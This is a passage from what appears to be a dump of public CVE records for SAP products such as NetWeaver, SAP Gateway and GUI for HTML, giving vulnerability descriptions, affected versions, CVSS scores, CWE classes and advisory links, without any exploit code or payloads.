"version_name": "\u003c",
"version_value": "7.5"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Under certain conditions SAP Gateway of ABAP Application Server (fixed in SAP_GWFND 7.5, 7.51, 7.52, 7.53; SAP_BASIS 7.5) allows an attacker to access information which would otherwise be restricted."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Information Disclosure"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "106471",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/106471"
},
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=509151985",
"refsource": "MISC",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=509151985"
},
{
"name": "https://launchpad.support.sap.com/#/notes/2723142",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/2723142"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2019-0248",
"datePublished": "2019-01-08T20:00:00",
"dateReserved": "2018-11-26T00:00:00",
"dateUpdated": "2024-08-04T17:44:16.209Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-32114
Vulnerability from cvelistv5
Published
2023-06-13 02:38
Modified
2025-01-03 02:06
Severity ?
EPSS score ?
Summary
SAP NetWeaver (Change and Transport System) - versions 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allows an authenticated user with admin privileges to maliciously run a benchmark program repeatedly in intent to slowdown or make the server unavailable which may lead to a limited impact on Availability with No impact on Confidentiality and Integrity of the application.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP_SE | SAP NetWeaver (Change and Transport System) |
Version: 702 Version: 731 Version: 740 Version: 750 Version: 751 Version: 752 Version: 753 Version: 754 Version: 755 Version: 756 Version: 757 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T15:03:29.114Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/3325642"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-32114",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-03T02:06:20.309745Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-01-03T02:06:36.461Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver (Change and Transport System)",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "702"
},
{
"status": "affected",
"version": "731"
},
{
"status": "affected",
"version": "740"
},
{
"status": "affected",
"version": "750"
},
{
"status": "affected",
"version": "751"
},
{
"status": "affected",
"version": "752"
},
{
"status": "affected",
"version": "753"
},
{
"status": "affected",
"version": "754"
},
{
"status": "affected",
"version": "755"
},
{
"status": "affected",
"version": "756"
},
{
"status": "affected",
"version": "757"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSAP NetWeaver (Change and Transport System) - versions 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allows an authenticated user with admin privileges to maliciously run a benchmark program repeatedly in intent to slowdown or make the server unavailable which may lead to a limited impact on Availability with No impact on Confidentiality and Integrity of the application.\u003c/p\u003e"
}
],
"value": "SAP NetWeaver (Change and Transport System) - versions 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allows an authenticated user with admin privileges to maliciously run a benchmark program repeatedly in intent to slowdown or make the server unavailable which may lead to a limited impact on Availability with No impact on Confidentiality and Integrity of the application."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 2.7,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-732",
"description": "CWE-732: Incorrect Permission Assignment for Critical Resource",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-28T21:56:20.581Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://launchpad.support.sap.com/#/notes/3325642"
},
{
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Denial of Service in SAP NetWeaver",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2023-32114",
"datePublished": "2023-06-13T02:38:20.376Z",
"dateReserved": "2023-05-03T14:48:13.764Z",
"dateUpdated": "2025-01-03T02:06:36.461Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-4003
Vulnerability from cvelistv5
Published
2014-06-09 20:00
Modified
2024-08-06 11:04
Severity ?
EPSS score ?
Summary
The System Landscape Directory (SLD) in SAP NetWeaver allows remote attackers to modify information via vectors related to adding a system.
References
| ▼ | URL | Tags |
|---|---|---|
| http://packetstormsecurity.com/files/126986/SAP-SLD-Information-Tampering.html | x_refsource_MISC | |
| http://www.securityfocus.com/archive/1/532331/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://seclists.org/fulldisclosure/2014/Jun/37 | mailing-list, x_refsource_FULLDISC | |
| http://www.securityfocus.com/bid/67923 | vdb-entry, x_refsource_BID | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://secunia.com/advisories/58633 | third-party-advisory, x_refsource_SECUNIA | |
| https://service.sap.com/sap/support/notes/1939334 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T11:04:28.167Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/126986/SAP-SLD-Information-Tampering.html"
},
{
"name": "20140606 [Onapsis Security Advisory 2014-020] SAP SLD Information Tampering",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/532331/100/0/threaded"
},
{
"name": "20140606 [Onapsis Security Advisory 2014-020] SAP SLD Information Tampering",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2014/Jun/37"
},
{
"name": "67923",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/67923"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "58633",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/58633"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1939334"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-06-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The System Landscape Directory (SLD) in SAP NetWeaver allows remote attackers to modify information via vectors related to adding a system."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/126986/SAP-SLD-Information-Tampering.html"
},
{
"name": "20140606 [Onapsis Security Advisory 2014-020] SAP SLD Information Tampering",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/532331/100/0/threaded"
},
{
"name": "20140606 [Onapsis Security Advisory 2014-020] SAP SLD Information Tampering",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2014/Jun/37"
},
{
"name": "67923",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/67923"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "58633",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/58633"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1939334"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-4003",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The System Landscape Directory (SLD) in SAP NetWeaver allows remote attackers to modify information via vectors related to adding a system."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/126986/SAP-SLD-Information-Tampering.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/126986/SAP-SLD-Information-Tampering.html"
},
{
"name": "20140606 [Onapsis Security Advisory 2014-020] SAP SLD Information Tampering",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/532331/100/0/threaded"
},
{
"name": "20140606 [Onapsis Security Advisory 2014-020] SAP SLD Information Tampering",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2014/Jun/37"
},
{
"name": "67923",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/67923"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "58633",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/58633"
},
{
"name": "https://service.sap.com/sap/support/notes/1939334",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1939334"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-4003",
"datePublished": "2014-06-09T20:00:00",
"dateReserved": "2014-06-09T00:00:00",
"dateUpdated": "2024-08-06T11:04:28.167Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-6814
Vulnerability from cvelistv5
Published
2013-11-19 19:00
Modified
2024-08-06 17:46
Severity ?
EPSS score ?
Summary
The J2EE Engine in SAP NetWeaver 6.40, 7.02, and earlier allows remote attackers to redirect users to arbitrary web sites, conduct phishing attacks, and obtain sensitive information (cookies and SAPPASSPORT) via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| https://service.sap.com/sap/support/notes/1854826 | x_refsource_CONFIRM | |
| http://secunia.com/advisories/55778 | third-party-advisory, x_refsource_SECUNIA | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| https://erpscan.io/advisories/erpscan-13-021-sap-portal-unvalidated-redirect/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:46:23.716Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1854826"
},
{
"name": "55778",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/55778"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-13-021-sap-portal-unvalidated-redirect/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-10-30T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The J2EE Engine in SAP NetWeaver 6.40, 7.02, and earlier allows remote attackers to redirect users to arbitrary web sites, conduct phishing attacks, and obtain sensitive information (cookies and SAPPASSPORT) via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1854826"
},
{
"name": "55778",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/55778"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-13-021-sap-portal-unvalidated-redirect/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-6814",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The J2EE Engine in SAP NetWeaver 6.40, 7.02, and earlier allows remote attackers to redirect users to arbitrary web sites, conduct phishing attacks, and obtain sensitive information (cookies and SAPPASSPORT) via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://service.sap.com/sap/support/notes/1854826",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1854826"
},
{
"name": "55778",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/55778"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "https://erpscan.io/advisories/erpscan-13-021-sap-portal-unvalidated-redirect/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-13-021-sap-portal-unvalidated-redirect/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-6814",
"datePublished": "2013-11-19T19:00:00",
"dateReserved": "2013-11-19T00:00:00",
"dateUpdated": "2024-08-06T17:46:23.716Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-27499
Vulnerability from cvelistv5
Published
2023-04-11 02:48
Modified
2024-08-02 12:16
Severity ?
EPSS score ?
Summary
SAP GUI for HTML - versions KERNEL 7.22, 7.53, 7.54, 7.77, 7.81, 7.85, 7.89, 7.91, KRNL64UC, 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could craft a malicious URL and lure the victim to click, the script supplied by the attacker will execute in the victim user's browser. The information from the victim's web browser can either be modified or read and sent to the attacker.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP_SE | GUI for HTML |
Version: KERNEL 7.22 Version: KERNEL 7.53 Version: KERNEL 7.54 Version: KERNEL 7.77 Version: KERNEL 7.81 Version: KERNEL 7.85 Version: KERNEL 7.89 Version: KERNEL 7.91 Version: KRNL64UC 7.22 Version: KRNL64UC 7.22EXT Version: KRNL64UC 7.53 Version: KRNL64NUC 7.22 Version: KRNL64NUC 7.22EXT |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T12:16:35.477Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/3275458"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "GUI for HTML",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "KERNEL 7.22"
},
{
"status": "affected",
"version": "KERNEL 7.53"
},
{
"status": "affected",
"version": "KERNEL 7.54"
},
{
"status": "affected",
"version": "KERNEL 7.77"
},
{
"status": "affected",
"version": "KERNEL 7.81"
},
{
"status": "affected",
"version": "KERNEL 7.85"
},
{
"status": "affected",
"version": "KERNEL 7.89"
},
{
"status": "affected",
"version": "KERNEL 7.91"
},
{
"status": "affected",
"version": "KRNL64UC 7.22"
},
{
"status": "affected",
"version": "KRNL64UC 7.22EXT"
},
{
"status": "affected",
"version": "KRNL64UC 7.53"
},
{
"status": "affected",
"version": "KRNL64NUC 7.22"
},
{
"status": "affected",
"version": "KRNL64NUC 7.22EXT"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSAP GUI for HTML - versions KERNEL 7.22, 7.53, 7.54, 7.77, 7.81, 7.85, 7.89, 7.91, KRNL64UC, 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could craft a malicious URL and lure the victim to click, the script supplied by the attacker will execute in the victim user\u0027s browser. The information from the victim\u0027s web browser can either be modified or read and sent to the attacker.\u003c/p\u003e"
}
],
"value": "SAP GUI for HTML - versions KERNEL 7.22, 7.53, 7.54, 7.77, 7.81, 7.85, 7.89, 7.91, KRNL64UC, 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could craft a malicious URL and lure the victim to click, the script supplied by the attacker will execute in the victim user\u0027s browser. The information from the victim\u0027s web browser can either be modified or read and sent to the attacker.\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-03T03:20:34.384Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://launchpad.support.sap.com/#/notes/3275458"
},
{
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Cross-Site Scripting (XSS) vulnerability in SAP GUI for HTML",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2023-27499",
"datePublished": "2023-04-11T02:48:52.677Z",
"dateReserved": "2023-03-02T03:37:32.233Z",
"dateUpdated": "2024-08-02T12:16:35.477Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-6822
Vulnerability from cvelistv5
Published
2013-11-19 19:00
Modified
2024-08-06 17:46
Severity ?
EPSS score ?
Summary
GRMGApp in SAP NetWeaver allows remote attackers to have unspecified impact and attack vectors, related to an XML External Entity (XXE) issue.
References
| ▼ | URL | Tags |
|---|---|---|
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:46:23.872Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-01-31T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "GRMGApp in SAP NetWeaver allows remote attackers to have unspecified impact and attack vectors, related to an XML External Entity (XXE) issue."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-6822",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "GRMGApp in SAP NetWeaver allows remote attackers to have unspecified impact and attack vectors, related to an XML External Entity (XXE) issue."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-6822",
"datePublished": "2013-11-19T19:00:00",
"dateReserved": "2013-11-19T00:00:00",
"dateUpdated": "2024-08-06T17:46:23.872Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2012-2612
Vulnerability from cvelistv5
Published
2012-05-15 01:00
Modified
2024-08-06 19:42
Severity ?
EPSS score ?
Summary
The DiagTraceHex function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.
References
| ▼ | URL | Tags |
|---|---|---|
| https://service.sap.com/sap/support/notes/1687910 | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities | x_refsource_MISC | |
| http://www.securitytracker.com/id?1027052 | vdb-entry, x_refsource_SECTRACK | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/75452 | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T19:42:30.628Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1027052"
},
{
"name": "netweaver-diagtracehex-dos(75452)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75452"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-05-08T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The DiagTraceHex function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-12-28T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1027052"
},
{
"name": "netweaver-diagtracehex-dos(75452)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75452"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-2612",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The DiagTraceHex function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://service.sap.com/sap/support/notes/1687910",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"name": "netweaver-diagtracehex-dos(75452)",
"refsource": "XF",
